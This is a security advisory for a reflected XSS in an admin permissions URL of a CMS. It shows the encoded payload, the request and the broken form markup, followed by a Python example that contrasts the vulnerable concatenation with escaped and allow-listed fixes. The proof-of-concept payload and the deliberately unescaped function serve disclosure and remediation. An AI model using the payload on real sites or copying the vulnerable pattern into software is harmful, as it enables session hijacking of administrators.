/admin/controllers/edit/activity/perms/
takes input directly from the URL path without sufficient sanitization, leading to a reflected XSS.
A valid admin session is required; without it, the user is redirected to the login page instead of the affected page.
URL:
http://icms.local/admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E
"><img src>
Request:
GET /admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E HTTP/1.1
Host: icms.local
[...]
The injected input is then reflected into the form's action attribute on the page like this:
<form action="/admin/controllers/edit/activity/perms_save/"><img src>" method="post">
It is recommended to sanitize (HTML-encode) the input before it is reflected into the affected page, so that quotes and angle brackets cannot break out of the attribute.
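As an added illustration (not the affected application's own code), the following Python shows the pattern the advisory describes next to its hardened form: the URL-encoded path segment is decoded and, in the vulnerable variant, concatenated straight into the form action attribute; in the fixed variants it is HTML-attribute-escaped or rejected by an allow-list. The route template and the assumption that the parameter is expected to be a short identifier are hypothetical.

```python
"""Added example: escaping a reflected URL path segment before it is placed
into an HTML attribute. Illustrative code only; the application's real
routing, template and expected parameter format are assumptions."""
import html
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample: the URL-encoded path segment from the advisory's request.
ENCODED_SEGMENT = "%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E"

# Assumption: the segment is supposed to be a short identifier (letters, digits, _ and -).
SAFE_ID = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

ACTION_PREFIX = '<form action="/admin/controllers/edit/activity/perms_save/'


def decode_path_segment(encoded: str) -> str:
    """Percent-decode a path segment exactly as a web framework would before routing."""
    return unquote(encoded)


def render_form_vulnerable(segment: str) -> str:
    """The pattern described in the advisory: the decoded value is concatenated
    into the attribute without escaping, so a quote ends the attribute and a
    following tag is parsed as markup."""
    return ACTION_PREFIX + segment + '" method="post">'


def render_form_escaped(segment: str) -> str:
    """Hardened form: HTML-escape the value (including quotes) so it stays
    inside the attribute value no matter what it contains."""
    return ACTION_PREFIX + html.escape(segment, quote=True) + '" method="post">'


def render_form_allowlisted(segment: str) -> Optional[str]:
    """Stricter option: reject anything that is not the expected identifier
    shape instead of reflecting it at all. Returns None when rejected."""
    if not SAFE_ID.fullmatch(segment):
        return None
    return render_form_escaped(segment)


def tag_injected(markup: str) -> bool:
    """Simple check for this template: the only '<' in a safe rendering is the
    one that opens the <form> tag, so any additional '<' means a tag was injected."""
    return markup.count("<") > 1


if __name__ == "__main__":
    decoded = decode_path_segment(ENCODED_SEGMENT)
    print("vulnerable:", render_form_vulnerable(decoded), tag_injected(render_form_vulnerable(decoded)))
    print("escaped:   ", render_form_escaped(decoded), tag_injected(render_form_escaped(decoded)))
    print("allowlist: ", render_form_allowlisted(decoded))
```

Escaping is the minimal fix for the reflection itself; the allow-list variant additionally avoids reflecting unexpected input at all, which is the safer default when the parameter has a known format.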